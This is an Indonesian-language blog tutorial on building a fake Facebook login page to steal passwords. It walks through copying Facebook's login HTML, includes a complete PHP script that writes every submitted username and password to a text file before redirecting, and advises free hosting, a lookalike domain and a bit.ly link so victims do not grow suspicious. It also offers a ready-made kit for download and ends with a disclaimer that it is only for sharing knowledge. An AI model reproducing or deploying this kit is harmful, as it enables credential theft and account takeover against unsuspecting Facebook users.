Cara Membuat Phising Facebook 2022 Terbaru 100% Work [Update]

Cara Mudah Membuat Phising Facebook 2022 Terbaru 100% Work dengan Hosting Gratisan!
Cara Membuat Shortlink Menggunakan Domain Sendiri

Cara Membuat Phising Facebook 2022 Terbaru 100% Work - Pada kesempatan kali ini saya akan berbagi sedikit tentang dunia hacking, Salah satunya yang sering dipakai oleh para Hacker Newbie yaitu dengan cara membuat Halaman Duplicate atau Halaman palsu yang biasa disebut dengan PHISING.

Lalu apa pengertian phising? Phising (Password Harvesting Phising) yaitu suatu metode yang digunakan untuk mencuri password dengan cara mengelabui target menggunakan fake form login pada situs palsu yang menyerupai situs asli.

Cara ini sangat mudah dan ampuh untuk menjebak pengguna untuk mendapatkan informasi peka, seperti kartu kredit, email dan kata sandi. Tapi pada Artikel ini saya akan coba membuat phising form login facebook.

Table of Contents

Cara Membuat Phising Facebook 2022 Terbaru 100% Work

Sekarang saya akan menjelaskan telebih dahulu cara kerja Phising yang saya buat disini. Cara kerja Phising adalah seseorang memasukan username dan passwordnya disebuah halaman loging palsu (Phising), username dan password tersebut akan terekam dan tersimpan pada file .txt atau bisa juga terkirim ke email pembuatan.

Baiklah, langsung saja ikuti tutorial cara membuat phising dibawah ini :

Langkah #1 : Buka halaman facebook, http://www.facebook.com/login.php

Cara Membuat Phising Facebook 2021 Terbaru Work

Langkah #2 : Klik kanan dan pilih View page source atau tekan CTRL + U untuk menampilan Source Kode HTML

Cara Membuat Phising Facebook 2021 Terbaru Work

Langkah #3 : Copy seluruh scipt nya dengan cara tekan CTRL+A, lalu paste ke notepad.
Langkah #4 : Cari kode action="/login.php?login_attempt=1" dan ganti menjadi "action=/login.php" kemudian rubah juga form method="POST" menjadi form method="GET"

Jika Anda sedikit kebingungan dengan cara diatas silakan bertanya melalui komentar, atau bisa juga langsung download file yang sudah saya edit dibawah. Tetapi saya kira mengikuti tutorial diatas lebih baik.
Phising FB 2022.zip 200kb
Langkah #5 : Simpan file notepad tersebut dengan nama Index.php (Agar file yang disimpan bereksistenti PHP, dalam kotak dialog Save As, pada bagian Save as type - pilih lah option All Files)
Langkah #6 : Jika sudah selesai, sekarang buka lembaran Notepad yang baru, dan tulis atau kamu bisa copy script berikut :
<?php
header("location:https://facebook.com/login.php");
$handle=fopen("password.txt","a");
foreach($_GET as $variable =>$value) {
fwrite($handle,$variable);
fwrite($handle,"=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit
?>
Langkah #7 : Save As Script diatas dengan nama Login.php
Langkah #8 : Buka notepad lagi dan biarkan isinya kosong, dan simpan dengan nama password.txt

Password.txt yaitu berguna untuk menyimpan hasil dari Rekam Email dan Pasword Korban yang Login Melalui Halaman fake Login Kalian.

Sampai pada tahap ini kita sudah berhasil membuat fake login facebook (Phising), tapi file tersebut belum dapat digunakan. karena pada tahap selanjutnya kita harus mempunyai hosting.

Jika Anda mendownload file diatas, lewati saja langkah-langkah ini, Anda bisa langsung loncat ke cara membuat hosting dibawah ini :

Cara Membuat Hosting Gratis

Ada banyak situs hosting gratis, tapi tidak semua hosting gratis dapat digunakan untuk membuat phising. salah satu hosting gratis yang bisa digunakan membuat phising adalah https://id.000webhost.com/.

Tapi jika Anda belum paham cara membuatnya. Mari simak tutorial membuat hosting gratis berikut :

Langkah #1 : Langkah pertama yaitu Anda harus membuat akun di 00webhost, silakan buka situsnya https://id.000webhost.com/

Cara Membuat Hosting Gratis

Langkah #2 : kemudian isi email aktif karena akan digunakan untuk confirmasi nantinya, isi password, paling penting yaitu membuat domain yang nantinya diguanakan untuk memanipulasi korban, usahakan semirip mungkin dengan situs aslinya. sebagai contoh : https://fbsosial.000webhostapp.com/

Cara Membuat Hosting Gratis

Langkah #3 : Cek email untuk verifikasi akun. kemudian klik "Manage website".

Cara Membuat Hosting Gratis

Langkah #4 : Langkah selanjutnya adalah kita akan meng-upload file phising yang sudah dibuat tadi. Caranya yaitu klik "Upload Own Website". masukan nama domain yang Anda buat tadi dan passwordnya untuk login ke file manager.

Cara Membuat Hosting Gratis
Cara Membuat Hosting Gratis

Langkah #5 : Upload file phising yang dibuat tadi pada direktori public_html dengan cara klik icon upload file.

Sebelum kamu upload ketiga file tersebut, edit terlebih dahulu file Login.php yang dibuat tadi pada poin ke enam, dan ganti https://facebook.com/login.php menjadi Alamat domain hosting yang sudah kamu buat sebelumnya https://domainanda.000webhostapp.com/Index.php

Langkah #6 : Buka file Index.php dengan cara Klik Kanan - View. Maka akan terbuka jendela baru hasil index phising yang kita buat. Untuk mencobanya kalian bisa memasukan email fb dan password ngasal dan kemudian cek pada file password.txt.

Cara Membuat Hosting Gratis

Anda tinggal membagikan link index.php tersebut, agar orang lain tidak curiga ada baiknya Anda konvert link tersebut melalui bit.ly atau situs konvert inputekno.

Berikut hasil tampilan phising facebook yang dibuat pada tutorial ini :

Tampilan Phising FB 2021 Terbaru

Penutup

Nah itu tadi Cara Membuat Fake Login Facebook atau Phising FB, jika kamu mengikuti tutorial dengan teliti dipasikan tidak akan ada masalah. Semoga bermanfaat, jika ada kendala kamu bisa bertanya melalui kolom komentar.

Informasi penting
TUTORIAL INI HANYA SEKEDAR BERBAGI PENGETAHUAN DAN JANGAN DIGUNAKAN UNTUK TINDAK KEJAHATAN, YAK !! JIKA TERJADI PENYALAHGUNAAN, ITU DILUAR TANGGUNG JAWAB PENULIS

Hi. Lets connect and be friends!
Gabung dalam percakapan